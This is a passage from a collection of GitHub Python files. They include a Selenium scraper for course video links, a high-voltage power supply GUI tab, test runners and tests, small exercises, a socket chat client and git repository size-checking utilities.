i['taskId'].startswith('6')]\r\n info.append(href_id[0:-1])\r\n print(info[0])\r\n x = 0\r\n\r\n try:\r\n while True:\r\n for i in info[x]: # 此处将一维列表与二维列表嵌套循环并拼接为视频所在地址\r\n driver = webdriver.Chrome()\r\n driver.get('https://edu.tipdm.org' + hrefs[x] + '/task/' + i +'/show') # 进入目标视频播放地址\r\n\r\n driver.find_element_by_name(\"_username\").send_keys(\"账号\") # 输入账号\r\n time.sleep(2)\r\n driver.find_element_by_id(\"login_password\").send_keys(\"密码\") # 输入密码\r\n time.sleep(1)\r\n driver.find_element_by_xpath(\"//*[@id='login-form']/div[4]/button\").click() # 点击登录\r\n HTML = etree.HTML(driver.page_source)\r\n time.sleep(1.5)\r\n title = HTML.xpath(\"//*[@id='dashboard-content']/div[1]/text()\") # 获取视频标题\r\n if title[1].strip().split(\":\")[1] =='进入实训平台':\r\n pass\r\n else:\r\n driver.get('https://edu.tipdm.org' + hrefs[x] + '/task/' + i +'/activity_show')\r\n innerHTML = driver.execute_script(\"return document.body.innerHTML\") # 获取网页js内容\r\n res = re.findall(\"(https:.*?.m3u8)\", innerHTML)[0] # 获取m3u8文件地址\r\n with open('数据.txt', 'a') as f:\r\n f.write(title[1].strip().split(\":\")[1] + ':' + res + '\\n') # 保存为文本(此处已经获取所有链接,但由于其需要苹果浏览器请求头伪装下载,直接调用ffmpeg不生效)\r\n time.sleep(20)\r\n driver.close()\r\n x += 1\r\n if x >13:\r\n break\r\n except IndexError:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n url()\r\n","repo_name":"xiaoxi-lyl/ShiPin","sub_path":"shipin.py","file_name":"shipin.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"7514114190","text":"class TAB_HV:\n def __init__(self):\n model = self.DPP.boardInfo.ModelName.decode()\n if model[-1] == 'M': self.sign = 1 - 2*self.DPP.HVCH\n elif model[-1] == 'P': self.sign = 1\n elif model[-1] == 'N': self.sign = -1\n\n vmax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].VMaxInfo.maximum\n vmin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].VMaxInfo.minimum\n imax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].ISetInfo.maximum\n imin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].ISetInfo.minimum\n umax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampUpInfo.maximum\n umin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampUpInfo.minimum\n dmax = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampDownInfo.maximum\n dmin = self.DPP.boardInfo.HVChannelInfo[self.DPP.HVCH].RampDownInfo.minimum\n self.gui.Title_0.setText(\"{} s/n {}, CH {}\".format(model, self.DPP.boardInfo.SerialNumber, self.DPP.HVCH))\n self.gui.Title_1.setText(\"Vₘₐₓ= {} V, Iₘₐₓ= {} μA\".format(int(vmax*self.sign), int(imax)))\n self.gui.VMax.setMaximum( vmax); self.gui.VMax.setMinimum( vmin)\n self.gui.IMax.setMaximum( imax); self.gui.IMax.setMinimum( imin)\n self.gui.RampUp.setMaximum( umax); self.gui.RampUp.setMinimum( umin)\n self.gui.RampDown.setMaximum(dmax); self.gui.RampDown.setMinimum(dmin)\n\n S = self.DPP.GetHVChannelPowerOn(self.DPP.HVCH)\n self.gui.V_ON.setChecked(S)\n self.gui.V_OFF.setChecked(not S)\n C = self.DPP.GetHVChannelConfiguration(self.DPP.HVCH)\n self.gui.VSet.setMaximum( int(C['VMax']))\n self.__SetValue(self.gui.VSet, int(C['VSet']))\n self.__SetValue(self.gui.VMax, int(C['VMax']))\n self.__SetValue(self.gui.IMax, int(C['ISet']))\n self.__SetValue(self.gui.RampUp, int(C['RampUp']))\n self.__SetValue(self.gui.RampDown, int(C['RampDown']))\n\n self.gui.V_ON.toggled.connect( self.__Switch_HV)\n self.gui.VSet.valueChanged.connect( self.__Set_HV)\n self.gui.VMax.valueChanged.connect( self.__Set_HV)\n self.gui.IMax.valueChanged.connect( self.__Set_HV)\n self.gui.RampUp.valueChanged.connect( self.__Set_HV)\n self.gui.RampDown.valueChanged.connect(self.__Set_HV)\n self.gui.timerA.timeout.connect( self.__Update_HV)\n\n def __SetValue(self, SB, V):\n SB.blockSignals(True); SB.setValue(V); SB.blockSignals(False) \n\n def __Update_HV(self):\n if self.gui.tab_HV.isVisible(): \n V, I = self.DPP.ReadHVChannelMonitoring(self.DPP.HVCH)\n if V is False:\n self.Disconnect()\n else:\n self.gui.VAct.display(self.sign*V); self.gui.IAct.display(I)\n if self.DPP.GetHVChannelStatus(0) == 'Disabled': \n self.gui.V_OFF.setChecked(True)\n self.gui.V_ON.setText(\"INH\")\n \n def __Switch_HV(self):\n if self.gui.V_OFF.isChecked(): self.DPP.SetHVChannelPowerOn(self.DPP.HVCH, 0)\n elif self.gui.V_ON.isChecked(): self.DPP.SetHVChannelPowerOn(self.DPP.HVCH, 1)\n \n def __Set_HV(self):\n P = {}\n P['VSet'] = float(self.gui.VSet.value())\n P['VMax'] = float(self.gui.VMax.value())\n P['ISet'] = float(self.gui.IMax.value())\n P['RampUp'] = float(self.gui.RampUp.value())\n P['RampDown'] = float(self.gui.RampDown.value())\n P['PWDownMode'] = int(0)\n self.DPP.SetHVChannelConfiguration(self.DPP.HVCH, P)\n self.DPP.SetHVChannelVMax(self.DPP.HVCH, P['VMax'])\n self.gui.VSet.setMaximum(P['VMax'])\n# print('set', self.DPP.HVCH)\n \n\n","repo_name":"muchnoi/HPGe-Acquisition","sub_path":"TABs/TAB_HV.py","file_name":"TAB_HV.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1998368724","text":"import os\nimport unittest\nimport HTMLTestRunner\nimport time\n\n\ndef all_case():\n # 获取所有测试模块\n s = unittest.TestLoader().discover(\n # 获取当前文件路径\n start_dir=os.path.join(os.path.dirname(__file__), \"test_case\"),\n # 选择文件\n pattern=\"test_*.py\",\n top_level_dir=None\n )\n return s\n\n\ndef get_now_time():\n return time.strftime('%Y-%m-%d %H-%M-%S', time.localtime())\n\n\ndef run():\n # 拼接文件路径\n file_name = os.path.join(\n os.path.dirname(__file__),\n \"report\",\n get_now_time() + '.html'\n ).replace('\\\\', '/')\n with open(file_name, \"wb\") as fp:\n runner = HTMLTestRunner.HTMLTestRunner(\n stream=fp,\n title=\"自动化测试\",\n description=\"必应测试\"\n )\n runner.run(all_case())\n\n\nif __name__ == '__main__':\n run()\n\n\n\n\n\n","repo_name":"ycw786369470/myblog","sub_path":"auto_test/Code/bing_test/all_test.py","file_name":"all_test.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8724684233","text":"import pytest\nimport torch\nimport numpy as np\nimport pugh_torch as pt\n\n\n@pytest.fixture\ndef random_input():\n return torch.rand(10, 11, 12, 13)\n\n\ndef test_batch_index_select_basic(random_input):\n dim = 1\n n_sample = 20\n\n expected_shape = list(random_input.shape)\n expected_shape[dim] = n_sample\n expected_shape = tuple(expected_shape)\n\n index = torch.randint(\n 0, random_input.shape[dim], size=(random_input.shape[0], n_sample)\n )\n result = pt.batch_index_select(random_input, dim=dim, index=index)\n\n assert result.shape == expected_shape\n\n\ndef test_batch_index_simple():\n dim = 1\n n_sample = 20\n\n input = torch.Tensor(np.arange(3 * 4).reshape(3, 4))\n index = torch.LongTensor(\n np.array(\n [\n [2, 0],\n [1, 1],\n [0, 3],\n ]\n )\n )\n\n expected = np.array(\n [\n [2, 0],\n [5, 5],\n [8, 11],\n ],\n )\n\n result = pt.batch_index_select(input, dim=dim, index=index)\n result = result.detach().cpu().numpy()\n\n assert result.shape == (3, 2)\n assert (result == expected).all()\n\n\ndef test_batch_index_select_negative_index(random_input):\n dim = 3\n n_sample = 20\n\n expected_shape = list(random_input.shape)\n expected_shape[dim] = n_sample\n expected_shape = tuple(expected_shape)\n\n index = torch.randint(\n 0, random_input.shape[dim], size=(random_input.shape[0], n_sample)\n )\n result = pt.batch_index_select(random_input, dim=-1, index=index)\n\n assert result.shape == expected_shape\n","repo_name":"BrianPugh/pugh_torch","sub_path":"pugh_torch/tests/utils/test_batch_index_select.py","file_name":"test_batch_index_select.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"34757398728","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndef plot_points_from_excel(file_path):\n df = pd.read_excel(file_path)\n plt.figure()\n num_columns = df.shape[1] # Get the number of columns\n print(f\"Number of columns in the Excel spreadsheet: {num_columns}\") # Print the number of columns\n\n legend_labels = {\n 'No Sidecars': 'No Sidecars',\n 'Client Sidecar': 'Client Sidecar',\n 'Server Sidecar': 'Server Sidecar',\n 'Both Sidecars': 'Both Sidecars'\n }\n colors = ['blue', 'red', 'green', 'purple']\n\n for i, col in enumerate(df.columns):\n label = legend_labels.get(col, col)\n plt.scatter(df.index, df[col], label=label, color=colors[i], alpha=0.7)\n\n # Calculate the median for each color\n median_value = df[col].median()\n mean_value = df[col].mean()\n\n # Modify the legend label to include median value\n median_label = f'Median {label}: {median_value:.1f} ms'\n\n plt.axhline(median_value, color=colors[i], linestyle='-', label=median_label)\n\n plt.yscale('log')\n\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Latency in ms (log scale)\")\n plt.title(\"Four Cases\")\n\n custom_legend = [plt.Line2D([], [], color=colors[i], marker='o', linestyle='', label=label) for i, label in enumerate(legend_labels.values())]\n plt.legend(handles=custom_legend, loc='upper left')\n\n plt.tight_layout()\n plt.savefig('four_cases_graph.png') # Save the figure before showing it\n plt.show()\n\nplot_points_from_excel('output.xlsx')\n","repo_name":"tomas-salgado/ServiceMeshTestingToolkit","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"569349355","text":"# Number Guessing Game Objectives:\nfrom random import randint\n# Include an ASCII art logo.\nfrom ascii import logo\n# Allow the player to submit a guess for a number between 1 and 100.\n# Check user's guess against actual answer. Print \"Too high.\" or \"Too low.\" depending on the user's answer.\n# If they got the answer correct, show the actual answer to the player.\n# Track the number of turns remaining.\n# If they run out of turns, provide feedback to the player.\n# Include two different difficulty levels (e.g., 10 guesses in easy mode, only 5 guesses in hard mode).\n\n\nEASY_LEVEL_TURNS = 10\nHARD_LEVEL_TURNS = 5\n\n\ndef check_number(guess, answer, turns):\n if guess > answer:\n print(\"Too High\")\n return turns - 1\n elif guess < answer:\n print(\"Too Low\")\n return turns - 1\n else:\n print(f\"You got it! The answer was {answer}.\")\n\n\ndef check_difficulty(level):\n if level == \"easy\":\n return EASY_LEVEL_TURNS\n else:\n return HARD_LEVEL_TURNS\n\n\ndef game():\n print(logo)\n print(\"-------------------------\")\n level = input(\"Choose a difficulty. Type 'easy' or 'hard': \")\n print(\"-------------------------\")\n answer = randint(1, 100)\n turns = check_difficulty(level)\n guess = 0\n\n while guess != answer:\n print(f\"You currently have {turns} reminding.\")\n\n guess = int(input(\"Make your guess: \"))\n\n turns = check_number(guess, answer, turns)\n if turns == 0:\n print(\"You run out of guesses, you lost!!\")\n print(f\"The answer was {answer}!!\")\n return\n else:\n print(\"Guess again!\")\n\n\ngame()\n","repo_name":"ping-n/python-100-days","sub_path":"guess_num/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29796140083","text":"#import library\nimport speech_recognition as sr\nimport time\n\n# Initialize recognizer class (for recognizing the speech)\nr = sr.Recognizer()\n\n# Reading Microphone as source\n# listening the speech and store in audio_text variable\ndef STT():\n with sr.Microphone() as source:\n print(\"Please wait. Calibrating microphone...\") \n # listen and create the ambient noise energy level \n r.adjust_for_ambient_noise(source, duration=5) \n r.dynamic_energy_threshold = True\n print(\"Talk\")\n audio_text = r.listen(source,timeout=5, phrase_time_limit= 15)\n print(\"Time over, thanks\")\n\n # recoginize_() method will throw a request error if the API is unreachable, hence using exception handling\n try:\n # using google speech recognition\n print(\"Text: \", r.recognize_google(audio_text))\n except sr.UnknownValueError:\n print(\"I didn't understand what you said.\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n\n return r.recognize_google(audio_text)\n\nif __name__ == \"__main__\":\n STT()","repo_name":"adityamaanas/openlab","sub_path":"English_STT.py","file_name":"English_STT.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"252930042","text":"# source : https://realpython.com/python-sockets/\r\nfrom encryption import *\r\n\r\nHOST = '127.0.0.1' # The server's hostname or IP address\r\nPORT = 65432 # The port used by the server\r\n\r\nif len(argv) > 1:\r\n\t# This means arg was passed. Assuming its IP\r\n\tHOST = str(argv[1])\r\n\r\nif len(argv) > 2:\r\n\t# this meanse two args was passed. Assuming it's port.\r\n\ttry:\r\n\t\tPORT = int(argv[2])\r\n\texcept:\r\n\t\tprint(\"Invalid port as argv. \" + str(PORT) + \" is now the port.\")\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\nconnected = True\r\nprint(f\"Connected to {HOST}:{PORT}!\")\r\n\r\nuseAsClient()\r\n\r\naes = difhel(s)\r\n\r\ndef listen():\r\n\tglobal s\r\n\tglobal connected\r\n\tglobal aes\r\n\r\n\tinDiffie = False\r\n\twhile connected:\r\n\t\tdata = receivedata(s, aes)\r\n\r\n\t\tif not data:\r\n\t\t\tconnected = False\r\n\t\t\tbreak\r\n\t\tif data == 'disconnect':\r\n\t\t\tsafeExit()\r\n\t\telif data == \"changekey\":\r\n\t\t\tssend(s, data, aes)\r\n\t\t\taes = difhel(s)\r\n\t\telse:\r\n\t\t\tprint(\"Server:\", data)\r\ndef sender():\r\n\tglobal s\r\n\tglobal connected\r\n\r\n\twhile connected:\r\n\t\ttry :\r\n\t\t\tmsg = str(input()).strip()\r\n\t\texcept EOFError:\r\n\t\t\tsafeExit()\r\n\r\n\t\tif msg == \"\":\r\n\t\t\tcontinue\r\n\t\telif len(msg) > 530:\r\n\t\t\tprint(\"ERROR: Your message was too big to send.\")\r\n\t\t\tcontinue\r\n\t\telif msg == \"disconnect\":\r\n\t\t\tsafeExit()\r\n\t\telif msg==\"clear\" or msg==\"cls\":\r\n\t\t\tcls()\r\n\t\telse:\r\n\t\t\tssend(s, msg, aes)\r\nt = threading.Thread(target=sender)\r\nt.daemon = True\r\n\r\ndef safeExit():\r\n\tglobal s\r\n\tglobal connected\r\n\r\n\tconnected = False\r\n\ttry:\r\n\t\tssend(s, \"disconnect\", aes)\r\n\texcept:\r\n\t\tpass\r\n\ts.close()\r\n\texit()\r\n\r\ntry:\r\n\tt.start()\r\n\tlisten()\r\nexcept:\r\n\tsafeExit()\r\ns.close()\r\n","repo_name":"SladetBask-Kasper/E2EE-CLI-Chat","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18251650193","text":"# coding:utf-8 \n'''\ncreated on 2018/5/8\n\n@author:sunyihuan\n'''\n\n\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param head: n\n @return: The new head of reversed linked list.\n \"\"\"\n\n def reverse(self, head):\n p1 = None\n p2 = head\n while (p2 is not None):\n tmp = p2.next\n p2.next = p1\n p1 = p2\n p2 = tmp\n return p1\n\n\ns = Solution()\nhead = ListNode(20, 3)\ncur = head\nfor i in range(1, 10):\n node = ListNode(i)\n cur.next = node\n cur = node\nhead = s.reverse(head)\nwhile (head != None):\n print(head.val, end=' ')\n head = head.next\n","repo_name":"sunyihuan326/analysis","sub_path":"LinCode/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35671342374","text":"FED_TAX = 0.05\r\nMUNICIPAL_TAX = 0.025\r\nQ_sales = float(input(\"Enter totals sales in $: \"))\r\n\r\n\r\ndef fed_tax_calculation():\r\n fed_tax = Q_sales * FED_TAX\r\n return fed_tax\r\n\r\n\r\ndef municipal_tax_calculation():\r\n municipal_tax = Q_sales * MUNICIPAL_TAX\r\n return municipal_tax\r\n\r\n\r\ndef total_taxes():\r\n fed_tax = fed_tax_calculation()\r\n municipal_tax = municipal_tax_calculation()\r\n total_tax = fed_tax + municipal_tax\r\n print(\"Federal taxes amounted: $\", format(fed_tax, \",.2f\"))\r\n print(\"Municipal taxes amounted: $\", format(municipal_tax, \",.2f\"))\r\n print(\"Total taxes amounted: $\", format(total_tax, \",.2f\"))\r\n\r\n\r\ntotal_taxes()\r\n","repo_name":"savelievayuliia/Starting-Out-with-Python-exercise-T-Gaddis","sub_path":"task09_program.py","file_name":"task09_program.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4485884359","text":"import math\n\ndef get(memory=\"4G\", cpu=1):\n '''calculate the resource requirements and return a\n dictonary that can be used to update the local variables'''\n\n if not memory.endswith(\"G\"):\n raise ValueError(\"Memory must be specified as XXG\")\n\n gb_requested = int(memory[:-1])\n\n mem_gb = int(math.ceil(gb_requested / float(cpu) ))\n\n spec = {\"job_memory\": str(mem_gb) + \"G\",\n \"job_threads\": cpu,\n \"r_memory\": gb_requested * 1000}\n\n return spec\n","repo_name":"oxfp/tenx","sub_path":"pipelines/pipeline_utils/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40415800096","text":"from django.conf import settings\r\nfrom datetime import datetime\r\nfrom dateutil.relativedelta import relativedelta\r\n\r\n\r\ndef core_values(request):\r\n data = {\r\n 'SITENAME': getattr(settings, 'SITENAME', \"il_doc's\"),\r\n 'ANALYTICS_ID': getattr(settings, 'ANALYTICS_ID', ''),\r\n 'YEARS': relativedelta(datetime.today(), datetime(1990, 6, 22)).years\r\n }\r\n return data\r\n","repo_name":"ildoc/ildoc.it_django","sub_path":"server/core/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12320713980","text":"def deposit(balance, money):\n print(\"입금이 완료 되었습니다. 잔액은 {0}원 입니다.\".format(balance + money))\n return balance + money\n\ndef withdraw(balacne, money): \n if balance >= money:\n print(\"출금이 완료되었습니다. 잔액은 {0} 원 입니다.\".format(balance - money))\n return balance - money\n else:\n print(\"출금이 완료되지 않았습니다. 잔액은 {0} 원 입니다\".format(balance))\n return balance\n\ndef withdraw_night(balance, money):\n commmission = 100 # 수수료\n return commmission, balance - money - commmission # 튜플, 여러 값을 반환\n\nbalance = 0\nbalance = deposit(balance, 1000)\nbalance = deposit(balance, 1000)\n\nbalance = withdraw(balance, 3000) # 실패\n\ncommmission, balance = withdraw_night(balance, 500)\nprint(\"수수료 {0}원이며, 잔액은 {1}원입니다.\".format(commmission, balance))","repo_name":"hjyu94/python","sub_path":"기본/26 [함수] 전달값과 반환값.py","file_name":"26 [함수] 전달값과 반환값.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37076350893","text":"# -*- coding: utf-8 -*-\nfrom builtins import (bytes, str, open, super, range,\n zip, round, input, int, pow, object)\n\nimport os\nimport re\nimport git\nimport fnmatch\nimport traceback\nfrom datetime import datetime\nimport filecmp\nimport sys\n\nfrom termcolor import colored\nimport colorama\ncolorama.init()\n\nimport gslab_make.private.metadata as metadata\nimport gslab_make.private.messages as messages\nfrom gslab_make.private.exceptionclasses import CritError, ColoredError\nfrom gslab_make.private.utility import norm_path, get_path, format_message, glob_recursive, open_yaml\nfrom gslab_make.write_logs import write_to_makelog\n\n\ndef _get_file_sizes(dir_path, exclude):\n \"\"\".. Walk through directory and get file sizes.\n \n Get file sizes for files in directory ``dir_path``, ignoring subdirectories in list ``exclude``.\n\n Parameters\n ----------\n dir_path : str\n Path of directory to walk through.\n exclude : list\n List of subdirectories to exclude when walking.\n\n Returns\n -------\n file_size : dict\n Dictionary of ``{file : size}`` for each file in ``dir_path``. \n \"\"\"\n\n file_sizes = []\n \n for root, dirs, files in os.walk(dir_path, topdown = True):\n dirs[:] = [d for d in dirs if d not in exclude]\n \n files = [os.path.join(root, f) for f in files]\n files = [norm_path(f) for f in files]\n sizes = [os.lstat(f).st_size for f in files]\n file_sizes.extend(zip(files, sizes))\n \n file_sizes = dict(file_sizes)\n \n return(file_sizes)\n\n \ndef _get_git_ignore(repo):\n \"\"\".. Get files ignored by git.\n \n Get files ignored by git for repository ``repo``.\n\n Parameters\n ----------\n repo : :class:`git.Repo`\n Git repository to get ignored files.\n\n Returns\n -------\n ignore_files : list\n List of files in repository ignored by git. \n \"\"\"\n\n g = git.Git(repo)\n root = repo.working_tree_dir\n\n ignore = g.execute('git status --porcelain --ignored', shell = True).split('\\n')\n ignore = [i for i in ignore if re.match('!!', i)]\n ignore = [i.lstrip('!!').strip() for i in ignore]\n ignore = [os.path.join(root, i) for i in ignore]\n\n ignore_files = []\n\n for i in ignore:\n if os.path.isfile(i):\n ignore_files.append(i)\n elif os.path.isdir(i):\n for root, dirs, files in os.walk(i):\n files = [os.path.join(root, f) for f in files]\n ignore_files.extend(files)\n\n ignore_files = [norm_path(i) for i in ignore_files]\n \n return(ignore_files)\n\n\ndef _parse_git_attributes(attributes):\n \"\"\".. Get git lfs patterns from git attributes.\n\n Get git lfs patterns from file ``attributes``.\n\n Parameters\n ----------\n attributes : str\n Path of git attributes file.\n\n Returns\n -------\n lfs_list: list\n List of patterns to determine files tracked by git lfs. \n \"\"\"\n\n try:\n with open(attributes) as f:\n attributes_list = f.readlines()\n \n lfs_regex = 'filter=lfs( )+diff=lfs( )+merge=lfs( )+-text' \n lfs_list = [l for l in attributes_list if re.search(lfs_regex, l)]\n lfs_list = [l.split()[0] for l in lfs_list] \n\n return(lfs_list)\n except IOError:\n raise CritError(messages.crit_error_no_attributes)\n \n\ndef _check_path_lfs(path, lfs_list):\n \"\"\".. Check if file matches git lfs patterns.\"\"\"\n\n for l in lfs_list:\n if fnmatch.fnmatch(path, l):\n return(True)\n \n return(False)\n\n\ndef _get_dir_sizes(dir_path):\n \"\"\".. Get file sizes for directory.\n \n Get file sizes for files in directory ``dir_path``.\n\n Parameters\n ----------\n dir_path : str\n Path of directory to get file sizes.\n\n Returns\n -------\n git_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git. \n git_lfs_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git lfs. \n \"\"\"\n\n try:\n repo = git.Repo(dir_path, search_parent_directories = True) \n root = repo.working_tree_dir\n except:\n raise CritError(messages.crit_error_no_repo)\n\n git_files = _get_file_sizes(dir_path, exclude = ['.git'])\n git_ignore_files = _get_git_ignore(repo)\n\n for ignore in git_ignore_files: \n try:\n git_files.pop(ignore)\n except KeyError:\n pass\n \n lfs_list = _parse_git_attributes(os.path.join(root, '.gitattributes'))\n git_lfs_files = dict()\n \n for key in list(git_files.keys()):\n if _check_path_lfs(key, lfs_list): \n git_lfs_files[key] = git_files.pop(key)\n \n return(git_files, git_lfs_files)\n\n\ndef _get_size_values(git_files, git_lfs_files):\n \"\"\".. Get file sizes for repository.\n\n Get file sizes for files in dictionary ``git_files`` and dictionary ``git_lfs_files``.\n\n Parameters\n ----------\n git_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git. \n git_lfs_files : dict\n Dictionary of ``{file : size}`` for each file tracked by git lfs. \n\n Returns\n -------\n file_MB : float\n Size of largest file tracked by git in megabytes.\n total_MB : float\n Total size of files tracked by git in megabytes.\n file_MB : float\n Size of largest file tracked by git lfs in megabytes.\n total_MB : float\n Total size of files tracked by git lfs in megabytes.\n \"\"\"\n\n file_MB = max(git_files.values() or [0])\n total_MB = sum(git_files.values() or [0]) \n file_MB_lfs = max(git_lfs_files.values() or [0]) \n total_MB_lfs = sum(git_lfs_files.values() or [0]) \n\n size_list = [file_MB, total_MB, file_MB_lfs, total_MB_lfs]\n size_list = [size / (1024 ** 2) for size in size_list]\n\n return(size_list)\n\n\ndef check_module_size(paths):\n \"\"\".. Check file sizes for module.\n\n Checks file sizes for files to be committed in the current working directory. \n Compares file sizes to size limits in file ``config`` and \n produces warnings if any of the following limits are exceeded.\n\n - Individual size of a file tracked by git lfs (``file_MB_limit_lfs``)\n - Total size of all files tracked by git lfs (``total_MB_limit_lfs``)\n - Individual size of a file tracked by git (``file_MB_limit``)\n - Total size of all files tracked by git (``total_MB_limit``)\n \n Warning messages are appended to file ``makelog``.\n\n Parameters\n ----------\n paths : dict \n Dictionary of paths. Dictionary should contain values for all keys listed below.\n\n Path Keys\n ---------\n config : str\n Path of project configuration file. \n makelog : str\n Path of makelog.\n\n Returns\n -------\n None\n \"\"\"\n \n try:\n git_files, git_lfs_files = _get_dir_sizes('.')\n file_MB, total_MB, file_MB_lfs, total_MB_lfs = _get_size_values(git_files, git_lfs_files)\n \n config = get_path(paths, 'config')\n config = open_yaml(config)\n max_file_sizes = config['max_file_sizes']\n \n print_message = ''\n if file_MB > max_file_sizes['file_MB_limit']:\n print_message = print_message + messages.warning_git_file_print % max_file_sizes['file_MB_limit']\n if total_MB > max_file_sizes['total_MB_limit']:\n print_message = print_message + messages.warning_git_repo % max_file_sizes['total_MB_limit']\n if file_MB_lfs > max_file_sizes['file_MB_limit_lfs']:\n print_message = print_message + messages.warning_git_lfs_file_print % max_file_sizes['file_MB_limit_lfs']\n if total_MB_lfs > max_file_sizes['total_MB_limit_lfs']:\n print_message = print_message + messages.warning_git_lfs_repo % max_file_sizes['total_MB_limit_lfs']\n print_message = print_message.strip()\n\n log_message = ''\n if file_MB > max_file_sizes['file_MB_limit']:\n log_message = log_message + messages.warning_git_file_log % max_file_sizes['file_MB_limit']\n exceed_files = [f for (f, s) in git_files.items() if s / (1024 ** 2) > max_file_sizes['file_MB_limit']]\n exceed_files = '\\n'.join(exceed_files)\n log_message = log_message + '\\n' + exceed_files\n if total_MB > max_file_sizes['total_MB_limit']:\n log_message = log_message + messages.warning_git_repo % max_file_sizes['total_MB_limit']\n if file_MB_lfs > max_file_sizes['file_MB_limit_lfs']:\n log_message = log_message + messages.warning_git_lfs_file_log % max_file_sizes['file_MB_limit_lfs']\n exceed_files = [f for (f, s) in git_lfs_files.items() if s / (1024 ** 2) > max_file_sizes['file_MB_limit_lfs']]\n exceed_files = '\\n'.join(exceed_files)\n log_message = log_message + '\\n' + exceed_files\n if total_MB_lfs > max_file_sizes['total_MB_limit_lfs']:\n log_message = log_message + messages.warning_git_lfs_repo % max_file_sizes['total_MB_limit_lfs']\n log_message = log_message.strip()\n\n if print_message:\n print(colored(print_message, metadata.color_failure))\n if log_message:\n write_to_makelog(paths, log_message)\n except:\n error_message = 'Error with `check_repo_size`. Traceback can be found below.' \n error_message = format_message(error_message) \n write_to_makelog(paths, error_message + '\\n\\n' + traceback.format_exc())\n raise ColoredError(error_message, traceback.format_exc())\n\n\ndef _get_git_status(repo): \n \"\"\".. Get git status.\n \n Get git status for repository ``repo``.\n\n Parameters\n ----------\n repo : :class:`git.Repo `\n Git repository to show working tree status.\n\n Returns\n -------\n file_list : list\n List of changed files in git repository according to git status.\n \"\"\"\n \n root = repo.working_tree_dir\n\n file_list = repo.git.status(porcelain = True)\n file_list = file_list.split('\\n')\n file_list = [f.lstrip().lstrip('MADRCU?!').lstrip() for f in file_list]\n file_list = [os.path.join(root, f) for f in file_list]\n file_list = [norm_path(f) for f in file_list]\n\n return(file_list)\n\n\ndef get_modified_sources(paths, \n source_map, \n depth = float('inf')):\n \"\"\".. Get source files considered changed by git.\n\n Checks the modification status for all sources contained in list \n ``source_map`` (returned by :ref:`sourcing functions`). \n Produces warning if sources have been modified according to git. \n When walking through sources, float ``depth`` determines level of depth to walk. \n Warning messages are appended to file ``makelog``.\n\n Parameters\n ----------\n paths : dict\n Dictionary of paths. Dictionary should contain values for all keys listed below.\n source_map : list\n Mapping of sources (returned from :ref:`sourcing functions`).\n depth : float, optional\n Level of depth when walking through source directories. Defaults to infinite.\n\n Path Keys\n ---------\n makelog : str\n Path of makelog.\n\n Returns\n -------\n overlap : list\n List of source files considered changed by git.\n\n Notes\n -----\n\n \"\"\"\n \n try:\n source_list = [source for source, destination in source_map]\n source_list = [glob_recursive(source, depth) for source in source_list]\n source_files = [f for source in source_list for f in source]\n source_files = set(source_files)\n \n try:\n repo = git.Repo('.', search_parent_directories = True) \n except:\n raise CritError(messages.crit_error_no_repo)\n modified = _get_git_status(repo)\n\n overlap = [l for l in source_files if l in modified] \n \n if overlap:\n if len(overlap) > 100:\n overlap = overlap[0:100]\n overlap = overlap + [\"and more (file list truncated due to length)\"]\n message = messages.warning_modified_files % '\\n'.join(overlap)\n write_to_makelog(paths, message)\n print(colored(message, metadata.color_failure))\n except:\n error_message = 'Error with `get_modified_sources`. Traceback can be found below.' \n error_message = format_message(error_message) \n 